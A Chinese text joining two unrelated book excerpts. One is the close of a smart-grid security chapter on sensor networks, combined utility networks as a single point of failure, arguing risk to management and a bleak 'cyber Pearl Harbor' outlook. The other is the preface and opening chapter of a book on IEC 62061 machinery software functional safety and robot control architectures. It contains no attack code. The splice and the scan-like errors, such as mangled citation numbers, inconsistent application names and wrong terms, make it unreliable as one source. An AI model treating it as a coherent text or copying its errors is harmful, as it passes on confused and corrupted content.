受欢迎, 一些消费者可能会把他们的怒气发泄到公用事业公司的工人身上,对工人 造成人身伤害。在其他情况下, 一些消费者可能会把工人当成抢劫犯,并试图用致 命武器保护他们自己的家。 14.4.2 更快地诊断问题 智能电网的实现肯定会包括高级传感器网络,用来报告智能电网中的潜在问 题。可以应用到智能电网中的一项技术是 SynchroPhasors 以及相量测量单元 (phasor measurement units,PMUs)的组合,每秒30 次观察记录电网测量值。北 美 SynchroPhasor 先 锋 组 织 (North American SynchroPhasor Initiative - www.naspi.org) 正致力于加快在智能电网中 SynchroPhasors和 PMUs 的应用, 包括如下方面: ● 网络相量测量设备 ● 相量数据共享 ● 应用 ● 广域监控 ● 实时操作 ● 能源系统计划 ● 电网扰动的侦查分析 让广域传感器网络最大可能发挥作用的关键是信息共享。因此,广域传感器 网络的网络架构会包括多家公用事业公司及它们彼此之间和与不同的部分之间是 如何联系的。SynchroPhasors 和它们支持的基础设施,以及其他传感器基础设施,需要有一个支持的网络架构和应用,可以将数据以人们能读懂的格式传送、分析和 呈现。传感器、设备、支持的网络架构和应用都需要被保护,否则它们可能会成为 攻击的潜在注入点。好消息是保护网络、应用和系统的安全不是新的问题。传统的安全控制措施也可以应用到新的传感器设备。例如,改变默认密码、禁用不必要 的服务和实现补丁管理过程达到固件升级,都适用于这些新设备。 14.4.3 不止电力 电网因为向智能电网的转变而获得最大的关注;不过,其他公用事业包括天然 气和水力也在转变中。智能天然气网和智能水力网将会和智能电网很相似,并且 在这本书中的内容大部分也都适用于这三种智能网类型。智能仪表、计量基础设 施和各种应用将会被采用,因而公用事业公司和消费者可以智能地管理他们所有 的公用事业类型。另外,高级传感器网络的应用有助于公用事业公司更快地发现 天然气和水的泄漏,在故障成为大问题之前远程修复它们。就像智能电网一样,每 个新设备和支持的基础设施都需要被保护,避免局部的或者是潜在的国家灾难。 在这本书里讨论的安全概念也适用于这些公用事业。 1)一个包含全部的智能网 由于在智能网中,应用于电、天然气和水力的基础设施非常相似, 一些城市正 把这三者组合为一个智能网。例如,佛罗里达州的塔拉哈西市正在建设一个电力、 天然气和水力三合一的智能网。这三者将会在同样的网络上操作,把数据从消费 者传递给公用事业公司,并允许消费者在非高峰时段启动智能设备。 这看上去是个合理的选择,因为这些公用事业公司可以共用相同的网络、量度 表和其他设备,从而减少应用智能网所需的成本。这也会减少需要安装在消费者 家里和办公室里的设备数量,可以把他们所有的使用情况数据整合到一个位置。 因此,不必要求消费者查看三个不同的网站获知他们的电、天然气和水的使用信 息,他们可以只查看一个网站。 Reese Goad,塔拉哈西市的公用事业商务和客服经理,这样描述每个消费者只 用一个网络和一个智能表的方法,“把这三个系统纳入一个伞形结构下,我们可以 告诉他们公用服务的总体花销,并且可以实时查看他们使用的公用服务的数 量。”[2I3]另一方面, 一位安全专家把这个称为单一故障点。如果攻击者可以成功 地攻击此单一网络,消费者的所有公用服务就都被切断了。在这种情况下, 一个备 用或冗余网络是很有用的;然而,出于预算的考虑而导致认为风险可接受的想法在 这些智能网的设计阶段占了上风。另外,把这三种服务整合到一个智能表中,会给 潜在的攻击者提供攻击的单一切入点。利用智能表自带的远程关闭功能,攻击者 通过攻击单个智能表就可能会切断电、天然气和水的供应。 14.4.4 好奇心式攻击 与技术服务供应商一起,公用事业公司应该预料到攻击会开始增加。家中安 装新设备后, 一些消费者将会很好奇地观察设备如何工作,他们可以用这个设备做 什么。电力盗窃长期困扰电力公司,而一些消费者试图通过网络攻击来窃电。不 幸的是,好奇心和轻微盗窃不是攻击的唯一缘由。在下一节将要讨论,公用事业公司需要准备面对来自有组织的罪犯,有组织的黑客团伙、恐怖组织和外国政府的 攻击。 14.5 安全专业人士应该期待什么及他们预测了什么? 目前,关于如何确保智能电网的安全,有很多说法。政府部门认为,智能电网 的安全关乎国家安全,大多数市场资料表明,智能电网的应用将提高现有电网的安 全。然而,大多数安全专业人士意识到存在许多威胁智能电网技术的问题,许多旧 的安全漏洞将在新技术中体现。安全专业人士以及其他政府官员预测,智能电网 的这些漏洞将在全世界范围内被发现和被利用。 14.5.1 安全 vs功能 在大多数情况下,当安全专业人士据理论证安全不应该排在功能之后时,他们 应该期待一个理性的辩论。安全已经成为智能电网发展的主要目标之一;然而,总 会有安全控制与其他智能电网要实现的目标产生直接冲突的情况。在这种情况 下,管理层需要作出最终决定。安全部门有责任确保管理层了解新功能的风险,使 管理层能够做一个深思熟虑的决定。如果管理层认为新功能是值得冒险的,安全 部门应负责制定补救措施,以降低新功能可能带来的风险。 1)论证 世界末日式的理论不会动摇大多数的高管。如果你负责向管理层告知风险, 那么一份关于攻击造成的破坏带来的损失的定量分析数据,佐以统计数字和强制 性的法规,将是最好的论证。在美国的大多数州都有数据破坏通知法案,要求组织 机构在个人验证信息被泄漏时,公布此情况。因此,把统计数据和现实实例呈现给 管理层并不困难。例如,隐私权利交换所维护了一份自2005年以来被公开的泄露 个人验证信息(personally identifiable information,PII)的事件的清单,他们称之为 资料泄露年表。这份清单可以从 www.privacyrights.org/ar/chrondatabreaches.htm 上浏览。此外,开放安全基金会管理着一个数据库,并有涉及泄漏 PII 的邮 件列表,关于开放安全基金会的 DatalossDB 数据库和邮件列表的更多信息可以从 http://datalossdb.org/ 浏览。 在与管理层讨论风险时,除了提到在破坏发生后调查、诉讼和修复漏洞的花费 外,遵守强制性法规也是一个有力的论据。在第6章“上市公司与私人公司”中,我们一起谈论了遵守和违反NERCCIP 可信标准所产生的影响。根据《联邦电力法》 第215条,NERC 有权对美国的机构实施罚款,最高可达每天一百万美元。虽然 遵守 NERC CIP标准并不是在任何情况下都发挥作用,但它可以帮助安全专业人 士在他们的公司内取得最基本的安全保障。 2)接受风险 当机构认为弥补漏洞的代价太过昂贵时,它就有可能决定接受风险。接受风 险也被称为风险确认,当在审计和风险评估中发现漏洞时,接受风险以及其他一些类似的条目都会被经常用到。例如,让我们一起来考虑一个重要的业务应用程序 FlicksJavaApp, 它是用JAVA 编程语言编写的。为了运行JAVA 应用程序,用户 必须在他/她的电脑上安装JAVA 运行环境(JRE) 。 由 于JAVA 编程语言和应用 程序编程接口(API) 的发展,传统的对象和函数不再被支持,而是被新的取代。因 此,如果 FlickJavaApp 依赖的是不被最新版的JRE 支持的旧函数,那么用户计算 机上更新了JRE 的版本将会导致 FlickJavaAPP 无法正常运行。由于 FlickJa- vaAPP 是机构运作所需的一个重要业务应用,所以机构需要决定或者投入资源重 新编码FlickJavaAPP 以适应新的JRE 版本,或者接受运行一个有漏洞的过时版本 的 JRE 的风险。虽然改正可能是昂贵的,但是安全专业人士应当建议管理层只有 到万不得已时才接受风险。 14.5.2 安全设备 随着大部分的新型智能电网技术寻求增强智能电网的功能,致力于智能电网 安全的设备也随之而来。这些安全设备包括以下: (1)应用于智能电表和设备的防病毒 (2)应用于智能电表和设备的基于主机的入侵检测和预防 (3)应用于智能电表和设备的防火墙 (4)低功耗设备的加密 (5)物理篡改预防 安全专业人士将负责确定这些产品对于减少公司风险的作用以及是否值得 投资。 14.5.3 悲观的前景 智能电网的潜在威胁已经在第2章“面向消费者的安全威胁与影响”和第3章 “面向公用事业公司的安全威胁与影响”中讨论过,然而这些大部分仍然是假设。 在未来的十年里,安全技术人员和国家安全专家预测这些威胁将由假设变成现实。 负责监管中央情报局(Central Intelligence Agency,www.cia.gov,CIA)、国 防情报局(Defense Intelligence Agency,www.dia.mil,DIA)和国家安全局(Na- tional Security Agency,www.nsa.gov,NSA)的前情报总长 Mike McConnell 与 哥伦比亚新闻广播公司(www.cbsnews.com) 的 Steve Kroft 进行了会晤,并讨论 了针对美国关键基础设施的网络攻击的可能性。[29]在会晤中,McConnell 指出如果 想对美国造成重大损害,不法分子势必会攻击海岸电网并把攻击扩散到全国电网 中,造成全国大规模的停电。[20]更重要的是,McConnell 认为,世界各地的军队和犯 罪组织有能力执行对电网的这类攻击。[29] 危害国家的网络攻击通常被称为“网络珍珠港战争”,并不只有 McConnell 一 个人认为这场战争将会涉及国家电网。很多安全专业人士都对智能电网的安全以 及电网更普遍后与之而来的风险提出了担忧。未来的战争将会从以摧毁一个国家 的关键基础设施为目的网络攻击开始,而不再是从发射导弹和依靠特种部队执行 外科手术式的军事打击而开始。 14.6 智能电网社区 无论你是拥有十年经验的安全专业人员还是没有经验仅是对智能电网安全感 兴趣的人,智能电网社区都将为你提供丰富的信息和资源。最新动态信息可从以 下资源中获得: ● 研讨会 ● 机构和团体 ● 新闻网站和博客 14.6.1 研 讨 会 和智能电网以及安全相关的研讨会主要针对智能电网相关技术中的威胁、漏洞和攻击提供详细资料。 14.6.2 机构团体 众多的政府机构、工业和社区团体都在调研、讨论并提供和智能电网安全相关 的信息。如果你想参与进来, 一些组织机构正在招募志愿者。例如,美国国家标准 技术研究所发布了其出版物的草案,正征求公众意见。在这本书中,已经提到过许 多此类组织机构,但为方便起见,表14.3列出了一些相关的机构和团体。这些可 以作为找到符合你兴趣和技能的组织的一个起点。 1)信息共享 在安全的国度里,信息共享可以说是一个矛盾。作为安全专业人员,你的任务 是保护机构的敏感信息不被泄露,并且你的工作依据多半是你所在机构的安全策 略。然而对风险、威胁和成功攻击的交流有助于使其他机构免受同样的攻击。成 功经验和失败教训的共享,有可能会使你的机构和智能电网社区都受益。 虽然开新闻发布会或者公开与新闻界人员讨论内部安全的相关主题,不是最 好的办法。但值得庆幸的是, 一些独立的资源确实存在。 举个例子,ES-IAC 是一个在电力部门中促进成员讨论安全相关主题的沟通渠道。 ES-IAC 的目标是为电力部门成员之间的合作提供一个渠道,以更好地应对电网安 全面临的威胁。 2)行业标准的发展 表14.3中所列的机构和团体将继续制定更多的智能电网标准。每一项新技 术的引入及评估都需要创建新的标准。为制定尽可能最好的安全标准,需要全球 合作,以解决不同地理区域的各种各样的难题。值得庆幸的是, 一些国家已经开始 携手合作。例如,日本和美国已达成协议,在冲绳岛和夏威夷岛开发联合智能电网 项目。这些岛屿有着共同的气候,并都依赖于传统的燃料,因此两国之间的合作成 为合理的选择。两国已商定在智能电网技术上合作,改善两个岛屿上的电网。[31] 不幸的是,由于电网的安全被认为关乎国家安全,跨国合作很有可能受到限制。 14.6.3 博客、新闻网站和 RSS 资源 主流新闻一般报道的是较大规模的涉及智能电网安全的事件。要想获得每日 更新和更多的技术分析,读者应经常查看和智能电网安全及技术相关的博客和新 闻网站。如果你正在读这本书,这就是一个好机会,你可以向你的RSS 资源库里 添加自己喜欢的博客和新闻网站。 14.7 总结 电网及其他公用事业的未来是光明的。应用新技术升级公共基础设施,给公 用事业和消费者带来的便利和效益,是托马斯·爱迪生、乔治·西屋和尼古拉·特 斯拉无法预料到的。但是, 一些安全专业人士已经为我们敲响警钟。 最终,在联邦政府、州政府、地方政府、公用事业公司、技术公司和消费者的共 同努力下, 一个安全的智能电网将会被实现。我们大家每个人在全世界保护智能 电网的运动中都将扮演很重要的角色。如果没有适当的安全控制措施,智能电网 的隐患将无法消除,对智能电网的憧憬将永远无法成为现实。
standards
机械安全-电气、电子和可编程电子控制系统软件功能安全标准解析与实践 前言 制造业是国民经济的主体,是立国之本、兴国之器、强国之基。机械制造业是制造业的核心,其技术发展水平决定了一个国家国民经济相关产业的产品质量、效益和市场竞争力的高低。机械制造技术也是传统产业实现产业升级的基础和根本手段。 进入21世纪以来,机械制造技术向自动化、柔性化、集成化、智能化、精密化和清洁化方向发展。自动化、智能化装备在发达国家取得了较快的发展,日本和德国凭借先发优势和技术积淀在机械/工业机器人领域具备优势,占据了较大的市场份额。 控制系统是整个机械制造装备或系统的“大脑”。控制系统的主要任务是对机械臂的正向运动学、逆向运动学求解,以实现操作空间坐标和关节空间坐标的相互转换,完成轨迹规划任务,实现高速伺服插补运算、伺服运动控制。机械控制系统由硬件和软件组成,系统的开发涉及较多的核心技术,包括硬件设计、底层软件技术、上层功能应用软件技术等。 如今,为实现系统间的协同和信息共享,机械制造装备已逐渐打破了封闭性,采用标准、通用的通信协议及硬/软件系统,甚至有的厂商已让自动化装备成为公共联网装备,从独立个体向互联网发展。目前很多机械制造装备已联网,这些联网的装备通过远程服务监控,提供装备维护、诊断和排故服务,并收集数据作为产品性能的改善提升依据。 由于机械制造领域现有的自动化装备网关、控制节点等部件的计算和存储能力有限,因此安全防范能力非常脆弱,机械制造装备经常与工人混线作业,存在重大安全隐患,特别是具备自主学习功能的人机协作及自主化装备,或者系统从与人保持距离作业向与人并肩协同作业发展,如何避免“机器伤人”甚至“杀人”事故、降低功能安全风险成为研究热点。随着控制系统的智能化发展,控制软件在设计上引入预测控制、约束控制等先进控制策略,在装备工作过程中引入自适应控制、学习控制等策略,在控制流程上引入专家系统、自动检测及自动补偿功能等应用。由于应用的比例不断增加,由软件缺陷导致的系统故障日益增多。目前面向机械制造领域的控制软件工程化水平较低,质量控制手段不足,自测试技术缺乏,因此由软件导致的功能安全问题数量呈上升趋势。 综上所述,加强对机械制造装备或系统软件功能安全技术的研究和开发,可以有效提高我国制造领域安全防护和管理水平,提高对整个系统、重大危险源和事故隐患的监控水平,降低系统及重要危险源、事故隐患点的风险,大幅减少经济损失和事故伤亡,实现用技术创造安全环境。 在国外,尤其是在欧洲,学者们经过20多年的探索,论证了以安全完整性等级和全生命周期安全管理为特色的功能安全,它是解决和提高电气、电子和可编程电子控制系统或装置功能安全保障的有效技术和管理模式。2000年,国际电工委员会(IEC)发布了功能安全基础标准IEC 61508《电气/电子/可编程电子安全相关系统的功能安全》,解决了困扰业界多年的复杂系统功能安全保障的理论与实践问题。随后,不同应用领域的功能安全标准陆续出台。制造装备控制系统相关的功能安全标准IEC 62061《机械安全 安全相关电气、电子和可编程电子控制系统的功能安全》于2005年发布,并于2012年进行了修订,提出了机械领域控制系统的安全分析和风险评价的概念及安全设计和防护措施。国外众多机械/工业机器人企业,如ABB、KUKA、Universal Robots、三菱电机等,依据标准竞相推出了安全部件和安全解决方案。在国家层面,我国的国家发展改革委、工业和信息化部等主管部委也通过设立专项基金,资助国内科研院所、企业的制造装备安全技术研究及安全产品研发、产业化。在此背景下,国内的机械/工业机器人安全研究及产品研发形成了良好的发展趋势。 IEC 62061是开展机械领域安全相关控制系统产品研制、测评和认证的重要依据。该标准阐述了IEC 61508在机械领域的具体应用,完善了在发生重大机器危险情况下执行安全相关电气控制系统的规范。我国也在2012年引进了IEC 62061标准,并将其转化为国家标准GB28526—2012。无特殊说明时,本书所提标准即IEC 62061和GB28526—2012。 标准提供了一些方法和要求,包括:指定由安全相关电气控制系统 (Safety Related Electrical Control System,SRECS)执行的符合各安全相关控制功能要求的安全完整性等级;使SRECS设计适合指定的安全相关控制功能;设计的集成安全相关子系统符合ISO13849标准要求;确认SRECS。 然而,由于IEC 62061标准的制定主要基于欧美等发达国家机械领域控制系统的功能安全实践经验,和我国相比,无论是在系统功能安全理论、工程实践方面,还是在人才储备等方面,均存在较大差异。而且,为了能够适应不同应用方向的控制系统研发项目,标准的绝大多数要求看上去都过于笼统或应用可行性差,导致读者在翻阅、参考标准时不清楚具体如何实施。尤其是在软件方面,不像硬件要求、硬件失效那样直观、可量化,功能安全部分阐述得简单,可参考性不强,因此该标准软件部分的安全风险评估、安全计划制订、安全性保障措施实施等,不能成为国内可行的软件功能安全实践指导。 本书结合编者在国内外机械/工业机器人、数字控制系统研究项目中的研发、测试评估、标准制定等方面的经验,阐述对IEC 62061标准,特别是该标准软件部分的理解。希望通过这些解读,揭示隐藏在标准字面下的实际要求及具体实施过程,帮助工业部门及制造装备研发企业理解软件安全生命周期过程中各项目标、活动和数据要求的真正含义,从而推动技术的正确应用,间接促进机械行业产品,尤其是机械/工业机器人产品的软件质量提升,助力制造业发展。 第1章 绪论 作为机械/工业机器人的“大脑”,控制系统的质量和可靠性不仅会影响整个设备,而且会影响设备操作人员的人身安全。因此,生产设备的厂商、用户和管理部门都对控制系统的质量保障非常关注。随着自动化、智能化的发展,制造业不仅要求生产效率提高,还要求减少操作人员的体力活动。其中,机械安全相关电气控制系统发挥着日益重要的作用。IEC 62061标准是以保障机械安全相关电气控制系统在安全相关功能实现上的正确性,以及降低机器风险为目的的指导性文件。 在功能安全的重点研究领域,如轨道交通、汽车电子等,软/硬件必须通过IEC 61508、ISO26262等标准验证功能安全的符合性,而本书提到的IEC 62061尚未成为一个强制性标准,它只是安全相关电气控制系统设计研发及评估的指导性文件。但是随着人机协作机器的大规模应用,机械安全相关电气控制系统必将得到更多的重视和更广泛的应用。 标准的作用是为机械安全相关电气控制系统的研制提供指导,并完善在发生重大机器危险情况时安全相关电气控制系统的运行规范。 标准提出了下列方法和要求: ·指定由安全相关电气控制系统(SRECS)执行的各个安全相关控制功能(SRCF)要求的安全完整性等级; ·使SRECS设计适合指定的安全相关控制功能; ·设计的集成安全相关子系统符合ISO13849标准的要求; ·确认SRECS。 标准中软件相关功能安全要求和实施主要参考IEC 61508标准,针对软件的不同安全完整性等级,软件在研制过程中需要满足不同的目标要求。 本章将对控制系统及软件、IEC 62061标准的发展等内容进行介绍,为标准理解和实践分析打下基础。 1.1 机械/工业机器人控制系统及软件 1.1.1 机械/工业机器人控制系统 数控机床、自动化设备和机械/工业机器人等产品主要由主体、驱动系统和控制系统3个基本模块组成。主体即机座和执行机构,包括机械臂、夹具、旋转机构、行走机构等。大多数机械/工业机器人有3~6个自由度,驱动系统包括动力装置和窗洞机构,用以驱动执行机构产生动作。控制系统按照输入的程序对驱动系统和执行机构发出指令信号,并进行控制。 传统的机械/工业机器人控制系统的功能如下。 ·记忆:存储作业顺序、运动路径、运动方式、运动速度和与生产工艺相关的信息。 ·示教:离线编程、在线示教等。 ·与外围设备联网:输入/输出、通信网络及同步接口。 ·故障诊断安全保护:运动时的系统状态监视、故障状态下的安全保护和故障自诊断。 ·位置伺服:机器人多轴联动、运动控制、速度和加速度控制、动态补偿等。 ·其他:坐标设置、人机接口和传感器接口。 1. 控制系统硬件结构 控制系统是自动化装备的核心。近年来随着微电子技术的发展,微处理器的性能越来越高,而价格越来越低,目前市场上已经出现了1~2美元的32位微处理器。高性价比的微处理器为机器人控制系统带来了新的发展机遇,使开发低成本、高性能的机器人控制器成为可能。为了保证系统具有足够的计算与存储能力,机器人控制器多采用计算能力较强的芯片,如ARM系列、DSP系列、POWER PC系列、Intel系列等。此外,已有的通用芯片在功能和性能上不能完全满足某些机器人系统在价格、性能、集成度和接口等方面的要求,催生了机器人系统对片上系统(System on Chip,SoC)技术的需求。将特定的处理器与所需要的接口集成在一起,可简化系统外围电路设计,缩小尺寸,并降低成本。例如,Actel公司将NEOS或ARM7的处理器内核集成在FPGA产品上,形成了一个完整的SoC。在机器人运动控制器方面,研究团队主要集中在美国和日本,如美国的DELTA TAU公司、日本的朋立株式会社等,它们都有成熟的产品面世。运动控制器以DSP(数字信号处理)技术为核心,采用基于PC的开放式结构。 2. 控制系统体系结构 在控制系统体系结构方面,研究重点是功能划分和功能之间的信息交换。开放式控制系统体系结构有两种基本类型:一种是基于硬件层次划分的体系结构,该类型体系结构比较简单,如三菱重工株式会社生产的PA210可携带式通用智能臂式机器人;另一种是基于功能划分的体系结构,它将软件、硬件一同考虑进来,这是控制系统体系结构研究和发展的方向。 当代机械/工业机器人涉及力学、感知、优化、控制、计算机、通信等多个专业学科门类,又涉及各种各样的软件、硬件,还涉及复杂多变的应用场景,要求控制系统的软件体系结构具备高适用性、高稳定性、高可扩展性,对控制系统提出了诸多挑战,例如: ·支持机器人各种控制策略的实现与切换; ·实现多层级/多模块间的实时数据交互; ·保证诸多功能的并行不悖; ·进行长时间稳定运行而不进入错误状态; ·设计友好的人机交互。 3. 控制系统软件开发环境 在软件开发环境方面,一般的机械/工业机器人公司都有自己独立的开发环境和独立的机器人编程语言,如日本的Motoman公司、德国的KUKA公司、美国的Adept公司、瑞典的ABB公司等。很多大学在机器人开发环境(Robot Development Environment)方面已进行了大量的研究工作,提供了很多开放的源代码,可在部分机器人硬件结构下进行集成和控制操作,目前已在实验室环境中进行了许多相关实验。国内外现有的机器人开发环境有TeamBots、ARIA、Player/Stage、Pyro、CARMEN、MissionLab、ADE、Miro.v.CVS、MARIE、FlowDesigner、RobotFlow等。从机器人产业发展来看,对软件开发环境的需求来自机器人最终用户,他们不仅使用机器人,而且希望通过编程赋予机器人更多的功能,这往往需要采用可视化编程环境来实现,如乐高MindStorms NXT的图形化编程环境和微软Robotics Studio提供的可视化编程环境。 4. 专用操作系统 (1)VxWorks。VxWorks是美国WindRiver公司于1983年设计、开发的一种嵌入式实时操作系统(RTOS),是Tornado嵌入式开发环境的关键组成部分。VxWorks具有可裁剪微内核结构;任务管理高效;任务间通信灵活;中断处理是微秒级的;支持POSIX1003.1b实时扩展标准;支持多种物理介质、标准及完整的TCP/IP网络协议等。 (2)Windows CE。Windows CE与Windows系列操作系统有较好的兼容性,这无疑是Windows CE推广的一大优势。Windows CE为建立针对掌上设备、无线设备的动态应用程序和服务提供了一种功能丰富的操作系统平台,它能在多种处理器体系结构上运行,并且适用于那些对内存占用具有一定限制的设备。 (3)嵌入式Linux。由于其源代码公开,人们可以任意修改,以满足自己的应用需求。其中大部分修改都遵从GPL,嵌入式Linux是开放源代码并且免费的,用户稍加修改后就可以应用于自己的系统。嵌入式Linux有庞大的开发人员群体,不需要专门的人才,只要懂UNIX/Linux和C语言即可,支持的硬件数量庞大。嵌入式Linux和普通Linux并无本质区别,PC上用到的硬件几乎都支持嵌入式Linux,而且各种硬件的驱动程序源代码都可以得到,这为用户编写自己专有硬件的驱动程序带来很大的方便。 (4)μC/OS-Ⅱ。μC/OS-Ⅱ是著名的源代码公开的实时内核,是专为嵌入式应用设计的,可用于8位、16位、32位单片机或数字信号处理器(DSP)。它的主要特点是源代码公开、可移植性好、可固化、可裁剪,以及具有占先式内核、可确定性等。 (5)DSP/BIOS。DSP/BIOS是TI公司特别为TMS320C6000TM、TMS320C5000TM和TMS320C28x系列DSP平台设计开发的一个尺寸可裁剪的实时多任务操作系统内核,是TI公司Code Composer Studio开发工具的组成部分之一。DSP/BIOS主要由3部分组成:多线程实时内核;实时分析工具;芯片支持库。利用实时操作系统开发程序,可以方便、快速地开发复杂的DSP应用程序。 5. 伺服通信总线技术 目前,国际上还没有专用于机器人系统的伺服通信总线,在实际应用过程中,人们通常根据系统需求,把常用的一些总线技术,如以太网、CAN、1394、SERCOS、USB、RS-485等用于机器人系统中。目前,伺服通信总线大致有两类,即基于RS-485和线驱动技术的串行总线及基于实时工业以太网的高速串行总线。 1.1.2 机械/工业机器人控制软件及其重要性 控制软件被誉为系统的“灵魂”。机器人的控制软件由3部分组成:常用动作执行软件、多信息综合处理软件和外部信息识别软件。机器人的常用动作执行软件的功能就是前进、后退、转向、夹取物件等。机器人在执行任务时,各种因素都会影响执行结果,因此多信息综合处理软件要对外部信息、数据库中的信息进行比较后再决策,决策结果就是及时调整机器人的各种动作。软件是决定机器人功能和性能的关键因素。 可以毫不夸张地说,机械/工业机器人的每个动作的完成都离不开控制软件的支持,操作者的每个意图都必须依靠控制软件才能实现。同时,控制软件还有一个明显的发展趋势,那就是它所完成的功能将越来越多。随着大数据、云计算、移动互联网等新一代信息技术同机器人技术相互融合速度的加快,3D打印、人工智能迅猛发展,机械/工业机器人的软件复杂性越来越高,控制软件的功能安全受到企业和用户的极大关注。 1.1.3 机械/工业机器人控制软件体系结构 机械/工业机器人控制软件系统十分复杂。这是因为机器人需要在一个充满噪声和具有不确定性的环境里实现传感器的实时感知、控制器的实时控制。而且,机器人控制软件系统需要在完成指定任务的同时,监控并对意外情况采取措施,这些功能的协调、异步执行,增加了系统的复杂性。一个严谨、完善的软件体系结构,加上支撑软件体系结构的编程工具,可以很好地应对机器人控制软件系统的复杂性,但是目前尚无适合所有应用的通用软件体系结构。不同的体系结构有不同的优缺点。 1. 软件体系结构发展 机器人编程始于1960年,斯坦福大学研究团队开发了名为Shakey的机器人。Shakey由摄像头、测距仪、碰撞传感器组成,其通过音频和视频接口连接到DEC PDP-10和PDP-15,如图1-1所示。 Shakey的软件体系结构分解为3个功能模块,分别是感知(Sensing)、计划(Planning)和执行(Acting)。感知模块把摄像头采集的图像转换成内在环境模型;计划模块结合环境模型和目标,生成一个能达到目标的计划;执行模块拿到计划后,发送指令给机器人。整个体系结构被称为感知-计划-执行(Sense-Plan-Act,SPA)结构,如图1-2所示。在之后的多年内,几乎所有的机器人控制软件体系都遵循这种SPA结构。 20世纪80年代,SPA结构的问题逐步出现。首先,计划生成在任何真实的环境中都要花费很长的时间,机器人可能会一直等待计划模块完成任务而停止所有的动作。其次,也是最重要的是,执行一个计划但没有实时感知周遭环境(与传感器联动)在动态场景下是非常危险的。在这种情况下,一些新的机器人控制软件体系结构开始出现,包括无功规划,计划可迅速生成,并且更依赖传感数据而不是内在的环境模型。当时最有影响力的是Brooks的包容式体系结构,共由不同层次互相作用的有限状态机组成,实现从传感器到执行器的直连。包容式体系结构示例如图1-3所示。 ▲图1-1 机器人Shakey ▲图1-2 SPA结构 ▲图1-3 包容式体系结构示例 在包容式体系结构中,多种行为可能在任何时候都处于活动状态,因此该体系结构包含了一种仲裁机制——可以使较高级别行为抢占较低级别行为的信号。例如,简单地驱动机器人在随机方向上运动,更高级别的行为可能需要传感器输入、检测障碍物并引导机器人避开障碍物。在没有障碍的环境中,更高级别的行为不会产生信号。但是,如果它检测到障碍物,则会覆盖较低级别的行为并引导机器人避障。一旦障碍消失并且较高级别的行为停止发送信号,较低级别的行为就会再次取得控制权。由此,可以构建多个相互作用的行为层,以生产越来越复杂的机器人。 然而,这种基于行为的机器人能力很快就达到了极限,实现长期目标行为非常困难,并且机器人的行为几乎不可能再优化。例如,在办公楼内投递邮件的机器人,可以通过在办公楼周围徘徊来寻找房间,然后进入房间投递邮件。但是,使用基于行为的体系结构来设计这样一个系统,安排当天的邮件以最优的顺序访问办公室,以最大限度地减少交付时间,是非常困难的。从本质上讲,机器人需要早期体系结构的规划功能,这些功能必须与基于行为的体系结构的反应性相结合,因此促进了多层机器人控制软件体系结构的发展。 2. 多层机器人控制软件体系结构 国外科学家设计了一种开始于底层的机器人结构,机器人行为在Rex语言中被编程为同步电路。中间层是一个条件序列器,基于并行程序语言实现,它将持续激活和停用Rex技能,直到机器人的任务完成。这种三层(3T)结构(计划、执行和行为控制)已被多代机器人应用,如图1-4所示。 图1-4 三层结构原型 Syndicate结构将3T结构扩展到多机器人协作中。在Syndicate结构中,每层的机器人不仅与上、下层的机器人相通,而且在同一层上也与其他机器人相通(见图1-5)。通过这种方式,人们可以在多个抽象级别设计分布式控制循环。 图1-5 Syndicate结构 除此之外,美国国家标准局(NBS)为美国国家航空航天局(NASA)开发的NASA/NBS标准参考模型(NASREM),后来被称为实时控制系统(RCS),是早期的用于遥控机器人的参考模型(见图1-6)。该参考模型是一个多层结构,其中每一层都具有相同的总体结构,但是从伺服层到推理层,运行频率越来越低。 图1-6 实时控制系统(RCS)参考模型 3. 机器人软件体系结构实现 机器人软件体系结构提供了大概视图,我们可根据该视图中部件的功能分解(或组成)进行建模。但是,使用高内聚功能模块构成的概念不能被有效地描述和模块化。例如,实时性、容错性和安全性等非功能性要求,是在软件系统多个部分出现且不能被限制在单个模块中的属性。为了满足这些要求,软件开发工作主要集中在保证控制程序的高效实现,以及利用特定硬件平台的功能在特定操作环境中执行特定的一组任务。 机器人软件工程师在设计过程中有时会因关注软件系统性能和代码验证而忽视软件系统的其他质量属性,如可维护性、互操作性和可重用性。因此,机器人研究实验室可能会以开放源代码库的方式提供一大批实现了机器人功能、算法和控制范例的应用程序。但在稍微不同的应用场景下,它们是无法重用的,因为对操作环境的假设和约束在软件实现中是被隐藏和硬编码的。 在过去的几年里,软件工程的许多方法(基于组件开发和基于模型驱动工程)已被逐步引入机器人软件系统的构建中,以简化机器人的开发并提高质量。现代机器人控制系统通常被设计为基于组件、分布式的系统(逻辑上),其中组件是实现单元,在设计中还会考虑系统基于代码的实现方式。 在机器人软件体系结构设计中,组件之间的交互通常比传统业务应用程序的更复杂。在开发机器人时,软件开发人员面临传感器和电机之间及多种处理算法之间基于事件、反应和分布式交互的复杂性问题。管理多个(分布式)活动对共享资源的并发访问是主要问题之一。出于这个原因,机器人特定的、基于组件的框架和工具包被开发出来,它们提供了实时执行、同步和异步通信、数据流和控制流管理及系统配置机制。 4. 最新的机器人软件体系结构 1)敏捷机器人开发网络(aRDnet) aRDnet是德国宇航中心(DLR)机器人和机电一体化研究所开发的软件套件,支持为具有硬实时要求的复杂机电系统开发基于分布式组件的系统。aRDnet已用于实现在机器人Justin的所有51个自由度(DOF)上运行kHz范围内、计算要求严格的控制回路,如阻抗控制和碰撞规避。机器人控制系统是一个由功能模块和通信链路构成的网络,它们分布在由千兆比特以太网等快速数字总线连接的计算机网络上。 aRDnet功能块是具有多个输入和输出端口的软件模块,用于隐藏实际的传输协议。例如,用户数据报协议(UDP)套接字或EtherCAT与互联模块交换数据。根据同步数据流计算模型,功能块可以由单独的进程执行或者按照同步组进行分组(用于与机器人硬件连接的功能块)。不同的同步组可以通过非阻塞读取和写入操作进行异步交互。 2)YARP机器人平台 YARP是一个开源项目,由意大利热那亚大学的LIRA-Lab与美国麻省理工学院的计算机科学和人工智能实验室(CSAIL)合作开发。它的设计思想与aRDnet相同,即高自由度机器人,如人形机构,并提供分布式控制系统。它包含一个轻量级的软件库,可在多个操作系统上使用、测试及分布式编程。与aRDnet类似,分布式软件模块通过输入/输出异步通信端口交换数据。与aRDnet不同的是,YARP端口可以根据不同的协议(TCP、UDP、多播等)以不同的数据传输速率管理给定模块的多个连接,从而允许配置服务质量(QoS)模块间的通信:输出端口可以将数据发送到多个目的地,而输入端口可以接收来自多个连接的数据。 3)开放机器人控制软件(Orocos) 